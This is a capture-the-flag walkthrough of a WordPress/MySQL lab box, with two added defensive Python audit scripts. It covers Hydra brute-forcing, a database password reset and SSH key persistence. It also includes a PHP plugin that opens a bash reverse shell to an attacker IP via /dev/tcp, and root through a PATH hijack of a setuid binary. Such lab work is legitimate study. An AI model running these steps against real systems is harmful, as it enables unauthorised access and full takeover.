This is a very straightforward machine. There is a small rabbithole right at the start with the Simply Poll plugin, though.
In this box, we will be tackling:
- Weird Hydra results.
- Resetting WordPress passwords through the database.
- Getting a reverse shell using a WordPress “plugin”.
- Exploiting an SUID binary.
1. Preliminary NMAP Scan
sudo nmap -sC -sV -oN nmap.txt 192.168.32.9 -v
Port 80 is open, and robots.txt has an entry for /wp-admin, so this is most likely running WordPress. We also rarely see port 3306 (MySQL) open on a box, so we definitely need to check that out as well.
2. WordPress Login
Let’s start with the website.
Nothing much to see here. Let's try to brute-force the login with hydra:
hydra -l admin -P /usr/share/wordlists/rockyou.txt sunset-midnight http-post-form "/wp-admin:log=^USER^&pwd=^PASS^&wp-submit=Log+In:The password you entered for the username"
Hydra reports a bunch of credentials, but none of them actually work (they are false positives). Let's move on to the MySQL server on port 3306 and try to brute-force that as well:
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://sunset-midnight
We got a hit: root:robert. Let's log in:
mysql -u 'root' -p -h 192.168.32.9
Let’s do a basic enumeration of databases.
select * from information_schema.schemata;
Now, let's see what's inside wordpress_db:
select table_name from information_schema.tables where table_schema='wordpress_db';
Alright, seems like we have a users table. Let's see if we can't find some passwords.
use wordpress_db;
select * from wp_users;
select user_login,user_pass from wp_users;
Let's try to crack the hash with john:
sudo john --wordlist:/usr/share/wordlists/rockyou.txt wp-admin.hash
sudo john --show wp-admin.hash
No luck here, so let's reset the password to admin directly in the database. WordPress still accepts a plain MD5 hash in user_pass for backward compatibility and rehashes it on the next successful login, so this works even though the existing hash is in the salted phpass format.
update wp_users set user_pass = md5('admin') where id=1 limit 1;
Now we can try to log in to the WordPress admin panel with admin:admin. And we're in.
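From the defender's side, the password reset above leaves a visible trace: a modern WordPress install stores salted phpass (or bcrypt) hashes, so a bare 32-character MD5 in wp_users.user_pass is a strong sign the column was written directly over SQL. The following Python audit is an added example, not code from the original post; it classifies the hash format of each row from a wp_users dump and flags accounts whose hash is unsalted or unrecognised. The sample rows are constructed here (the phpass value is a placeholder of the right shape, the MD5 value is md5("admin"), which is exactly what the update statement above writes).

```python
import re
from typing import Iterable

# Hash formats WordPress can store in wp_users.user_pass:
#   $P$ / $H$            phpass (salted, stretched MD5), the long-standing default
#   $2y$ / $wp$          bcrypt, used by newer releases
#   32 lowercase hex     legacy unsalted MD5, accepted only for backward compatibility
#                        and rehashed on next login; in a current install it usually
#                        means user_pass was set by hand in the database
LEGACY_MD5 = re.compile(r"^[0-9a-f]{32}$")


def classify_wp_hash(user_pass: str) -> str:
    """Return the hash family of a wp_users.user_pass value."""
    if user_pass.startswith(("$P$", "$H$")):
        return "phpass"
    if user_pass.startswith(("$2y$", "$wp$")):
        return "bcrypt"
    if LEGACY_MD5.match(user_pass):
        return "legacy-md5"
    return "unknown"


def audit_wp_users(rows: Iterable[tuple[str, str]]) -> list[dict]:
    """One finding per account whose stored hash is not a salted WordPress format."""
    findings = []
    for login, user_pass in rows:
        kind = classify_wp_hash(user_pass)
        if kind in ("legacy-md5", "unknown"):
            findings.append({
                "user_login": login,
                "format": kind,
                "reason": "unsalted or unrecognised hash; check for a direct database change",
            })
    return findings


# Constructed sample rows (not taken from the box).
SAMPLE_ROWS = [
    ("editor", "$P$B" + "x" * 30),                    # placeholder phpass string
    ("admin", "21232f297a57a5a743894a0e4a801fc3"),    # md5("admin")
]

if __name__ == "__main__":
    for finding in audit_wp_users(SAMPLE_ROWS):
        print(finding)
```

Run it against the output of `select user_login,user_pass from wp_users;` and any legacy-md5 hit on an install that has been on a phpass or bcrypt release for years deserves the same attention as the MySQL root login that produced it: check the MySQL general or binary log for the update statement and rotate the affected account.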
3. WordPress Plugin Reverse Shell
Now that we're in, we can try to get a reverse shell going through WordPress plugins. Let's create the following PHP file as our "plugin", then zip it. (The shell_exec argument needs to be a quoted PHP string; the bash command inside it is wrapped in single quotes.)
<?php
/**
 * Plugin Name: abcdefg
 * Author: hijklmnop
 */
shell_exec("bash -c 'bash -i >& /dev/tcp/192.168.32.4/8000 0>&1'");
?>
7z a rev.zip rev.php
Now we can upload the plugin, set up a netcat listener on port 8000, then activate the plugin to trigger the reverse shell.
4. Pivoting to User
Since we're logged on as www-data, let's take a look at /etc/passwd to determine who we need to pivot to.
Let's see if we can't pivot to jose. We can automatically enumerate this machine with linpeas.sh, so let's upload and run that.
linpeas turned up some potential credentials: jose:645dc5a8871d2a4269d4cbe23f6ae103. Let's try to switch user to jose using them.
Now we’re in. Let’s grab the user flag first.
Next, for a more permanent foothold, we will generate an SSH key pair. Now that we have generated the private and public key pair, we need to copy the contents of the public key into jose's authorized_keys file on the target.
Let’s log back into SSH using the private key.
ssh email@example.com -i ./keys/id_rsa
5. Exploiting SUID to Root
Let's upload and run the enumeration script again as jose. In the output, we see a file, /usr/bin/status, which has the SUID/SGID bit set. This file is most likely a custom binary. Running it produces an error.
Let’s run strings on it to roughly see what it does.
It looks like it's trying to run the service binary by bare name rather than by absolute path, and that binary doesn't exist on this box. We can create our own service script in /home/jose that executes /bin/bash as root, with the following script:
#!/bin/bash
bash -c /bin/bash
For this to work, we will also need to add /home/jose to the $PATH environment variable.
Next, we can run which service to verify that our script is the one found when /usr/bin/status executes service.
Now, let's run /usr/bin/status and get a root shell.
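The root cause here is a setuid binary that launches a helper by bare name, so the caller's $PATH decides what runs as root. The fix on the binary side is to use an absolute path (or reset PATH to a fixed value before calling out), and the detection side is to audit setuid/setgid files for exactly this pattern. The script below is an added example, not part of the original post or of the box: it walks a directory for setuid/setgid regular files and, for each, pulls printable strings out of the binary and reports any that begin with a common command name without a leading slash. The SAMPLE_BLOB is a constructed stand-in for the contents of a binary like /usr/bin/status, and the COMMON_COMMANDS list is an assumed starting point, not an exhaustive one.

```python
import os
import re
import stat
from typing import Iterator

PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")
# First word of a string that would be resolved through $PATH if passed to system()/execvp().
COMMAND_WORD = re.compile(r"^(?P<cmd>[A-Za-z][A-Za-z0-9_.-]*)(\s|$)")
# Assumed deny-list of helpers a privileged binary should only call by absolute path.
COMMON_COMMANDS = {
    "service", "systemctl", "sh", "bash", "cat", "ls", "ps", "netstat",
    "ss", "id", "whoami", "cp", "mv", "rm", "chmod", "chown", "find",
}


def relative_command_strings(blob: bytes) -> list[str]:
    """Printable strings in `blob` that look like a command invoked without an absolute path."""
    hits = []
    for m in PRINTABLE.finditer(blob):
        s = m.group(0).decode("ascii")
        w = COMMAND_WORD.match(s)
        if w and w.group("cmd") in COMMON_COMMANDS:
            hits.append(s)
    return hits


def find_privileged_binaries(root: str) -> Iterator[str]:
    """Yield regular files under `root` with the setuid or setgid bit set."""
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                yield path


def audit_binary(path: str) -> dict:
    """Report relative command strings found in one privileged binary."""
    with open(path, "rb") as fh:
        blob = fh.read()
    return {"path": path, "relative_commands": relative_command_strings(blob)}


# Constructed stand-in for an ELF that calls system("service --status-all").
SAMPLE_BLOB = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9
    + b"service --status-all\x00"
    + b"/bin/sh\x00"
    + b"GCC: (Debian) 10.2.1\x00"
)

if __name__ == "__main__":
    for path in find_privileged_binaries("/usr/bin"):
        report = audit_binary(path)
        if report["relative_commands"]:
            print(report)
```

A hit is a lead, not proof: a string like "ls -la" may be a help message rather than an argument to system(). But on a box where a custom setuid file turns up with "service --status-all" embedded and no absolute path, this is the exact condition the walkthrough abused, and the binary should either hard-code /usr/sbin/service, set PATH to a known value before the call, or drop its privileges first.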